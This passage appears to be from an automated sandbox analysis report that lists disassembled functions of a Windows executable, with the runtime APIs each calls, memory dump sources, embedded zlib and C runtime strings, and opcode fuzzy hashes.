                                                                • Part of subcall function 00007FF6FB1F9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6FB1F9BEF,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1F9C3E
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB204F44
                                                                • Part of subcall function 00007FF6FB204908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB20491C
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051BA
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051CB
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051DC
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FB20541C), ref: 00007FF6FB205203
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                              • String ID:
                                                              • API String ID: 1458651798-0
                                                              • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                              • Instruction ID: f639b0aa5e08c4bbfd391599fb3a6491ca6d7af74d319029684dea07566e0757
                                                              • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                              • Instruction Fuzzy Hash: C4D1A026E1824386E720EF25DAA01B963A1EF4C7D4F44A535EA2DC7AE5FE3CE441C740
                                                              Function 00007FF6FB1F9924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                              • Instruction ID: e30b4200656ae975394dda14665093425b56bd2c92e8d4d1f2032a7fcbb2e710
                                                              • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                              • Instruction Fuzzy Hash: 66317636A08B8285D760DF25E8542BE73A4FB8C798F541135EAAD87BA9EF3CD145C700
                                                              Function 00007FF6FB200B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 2227656907-0
                                                              • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                              • Instruction ID: d122b4eb2813cd70ffce6843a5c107e519c131e620da343c94caa06004dd2823
                                                              • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                              • Instruction Fuzzy Hash: D3B19621B1869B41FB60DB21D6245BA6291EB58BE4F446132EA6DD7BEDFF3CE441C300
                                                              Function 00007FF6FB20518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051BA
                                                                • Part of subcall function 00007FF6FB204908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB20491C
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051CB
                                                                • Part of subcall function 00007FF6FB2048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB2048BC
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051DC
                                                                • Part of subcall function 00007FF6FB2048D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB2048EC
                                                                • Part of subcall function 00007FF6FB1F9C58: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C6E
                                                                • Part of subcall function 00007FF6FB1F9C58: GetLastError.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C78
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FB20541C), ref: 00007FF6FB205203
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
                                                              • String ID:
                                                              • API String ID: 2248164782-0
                                                              • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                              • Instruction ID: 84219a2c855dfa693130133d1c4c34ccd528d016bfff61c364647bc3c10870ae
                                                              • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                              • Instruction Fuzzy Hash: 7D514E32A1864386E720EF21EAA11B96760BF4C784F44A535EA6DC76F6EF3CE4408740
                                                              Function 00007FF6FB1EC330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                              • Instruction ID: 0d44c07b34abdebbf698619f9d83ddde915a951e6aea69ede6e902a6afa5f816
                                                              • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                              • Instruction Fuzzy Hash: 9B114826B14B068AEB00DB60E9542BC33A4FB5D758F041E31DA2DC6BA4EF78E1998340
                                                              Function 00007FF6FB202F20 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: memcpy_s
                                                              • String ID:
                                                              • API String ID: 1502251526-0
                                                              • Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                              • Instruction ID: 6db5c189c9bd3171c31b18d47c2dbb82dc4d3415bba6af41397f8d29150b7951
                                                              • Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                              • Instruction Fuzzy Hash: 1BC1D072A1968787E7248F19A19467AB791F78CBC4F40A135DB5AC3794EF3DE801CB40
                                                              Function 00007FF6FB1E979B Relevance: 4.1, Strings: 3, Instructions: 397COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $header crc mismatch$unknown header flags set
                                                              • API String ID: 0-1127688429
                                                              • Opcode ID: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
                                                              • Instruction ID: 17dbab419e158e4d0d0bd975f30c0bdf4cd077021e21cd1450eb229fb540ce5a
                                                              • Opcode Fuzzy Hash: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
                                                              • Instruction Fuzzy Hash: B3F16372E183D64BE7A5CB15C088A3E7AE9EF48788F055538DA5987BE0EF78E540C740
                                                              Function 00007FF6FB208A38 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise_clrfp
                                                              • String ID:
                                                              • API String ID: 15204871-0
                                                              • Opcode ID: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
                                                              • Instruction ID: 18f9ad92a52d5fb2a4385b4198914d048b67fb94ec07d2bb1397b4705e6138b7
                                                              • Opcode Fuzzy Hash: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
                                                              • Instruction Fuzzy Hash: 27B16C73604B8A8AEB15CF29C5563693BA0F748B88F149921DB6DC7BB8DF39D451C700
                                                              Function 00007FF6FB1F2CC4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $
                                                              • API String ID: 0-227171996
                                                              • Opcode ID: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
                                                              • Instruction ID: f02ae220fc6369b067e776ba1c486de961b38295c6abac39179726986b33e80e
                                                              • Opcode Fuzzy Hash: 25965de2e6678be5c8c686b25b3b835ec4bf2bfab2b797158b347abdb642f747
                                                              • Instruction Fuzzy Hash: 5FE1A272E0864782EB68DF25D15017933A1FF49B4CF244235EA6E876F5EF29E852C780
                                                              Function 00007FF6FB1E95FB Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: incorrect header check$invalid window size
                                                              • API String ID: 0-900081337
                                                              • Opcode ID: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
                                                              • Instruction ID: 2051bcc12ddfff9dbbd10e09f1779bd2168d46051221a11e1b214258d0db1d5c
                                                              • Opcode Fuzzy Hash: 226024973a440a2a6261c5f164d8bafa30541a105b972a390c392a8354fe07a0
                                                              • Instruction Fuzzy Hash: 55917872E182C747E7A5CB14C498A7E3AA9FB48398F154139DA5A87AE0DF38F540CB40
                                                              Function 00007FF6FB1FD200 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: e+000$gfff
                                                              • API String ID: 0-3030954782
                                                              • Opcode ID: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
                                                              • Instruction ID: acd560cdc6500519427239546a256bc55ac16679b818491ebc65e18340f68233
                                                              • Opcode Fuzzy Hash: 1324d18368fb7be0dec1b44ace24e6b174879433860390047f5d35653063db2a
                                                              • Instruction Fuzzy Hash: 7C515862F186CA46E725CE36D8017796B91E748B98F489271CBA8CBAE5EE3DD440C740
                                                              Function 00007FF6FB1FFBD8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                              • String ID:
                                                              • API String ID: 1010374628-0
                                                              • Opcode ID: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                              • Instruction ID: 2405bd21913fa81db3aaa9e3a43c0f2d012c5086333d96a0a89a0798a1a5338f
                                                              • Opcode Fuzzy Hash: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                              • Instruction Fuzzy Hash: 2302AA22E1A68740FB65EB21A95127A2680AF4DBE8F455635DE7DC63F6FE7CE401C300
                                                              Function 00007FF6FB1FCD6C Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gfffffff
                                                              • API String ID: 0-1523873471
                                                              • Opcode ID: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
                                                              • Instruction ID: 54cf5c3344d337efd30be837b24edea48b0b307a8ff19b45c06680a693bc7a66
                                                              • Opcode Fuzzy Hash: ee332c23296b8dd3ed29fdb42bef122adb490463d0c8b601810d73b835641fc7
                                                              • Instruction Fuzzy Hash: CCA14862F0878B46EB21CB29A4007BDBB91AB58B88F058131DE5D87BE5EE3DD501D701
                                                              Function 00007FF6FB1F7AAC Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: TMP
                                                              • API String ID: 3215553584-3125297090
                                                              • Opcode ID: dd4bbb8096afc2135879a6e6acc50949ef59d292da7f7bf8111e5166495e4f15
                                                              • Instruction ID: 6c2b5e47e3301e2e8c6d82412497d977f7e7316235823c3f668eea3fb8b6d495
                                                              • Opcode Fuzzy Hash: dd4bbb8096afc2135879a6e6acc50949ef59d292da7f7bf8111e5166495e4f15
                                                              • Instruction Fuzzy Hash: 83519F29F0C64741FB68EB2699115BA5291AF89BC8F485434DE2DC77F6FE3CE45AC200
                                                              Function 00007FF6FB202790 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                              • Instruction ID: c7d22a6ecfbf1e6972acf08a481a0f94ce611f6682f82235475f626c276dc700
                                                              • Opcode Fuzzy Hash: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                              • Instruction Fuzzy Hash: A2B09224E17A87C2EB082B116DAA22822A47F8C710FA48138C41DC13B0EE2C20A54700
                                                              Function 00007FF6FB1F28C0 Relevance: .3, Instructions: 327COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                              • Instruction ID: 43c103093313f571fd5e689831b39a2bacd17e70a5aa2107c639e6027088a4d4
                                                              • Opcode Fuzzy Hash: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                              • Instruction Fuzzy Hash: 09D1B332E0865786EB78EE25855027D27A0FB49B8CF145235EE2D876E5EF3DE841C780
                                                              Function 00007FF6FB1E8B20 Relevance: .3, Instructions: 287COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                              • Instruction ID: bb6318eade59400a03c3f57b4cd4f9b0c83cb2ee7bed656787fec3c0f966d440
                                                              • Opcode Fuzzy Hash: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                              • Instruction Fuzzy Hash: EFC1AE726142F24FD289EB29E4695BA73E1F79830DBD4402AEB8747FC5CA3CA414D790
                                                              Function 00007FF6FB1F1F30 Relevance: .2, Instructions: 241COMMON
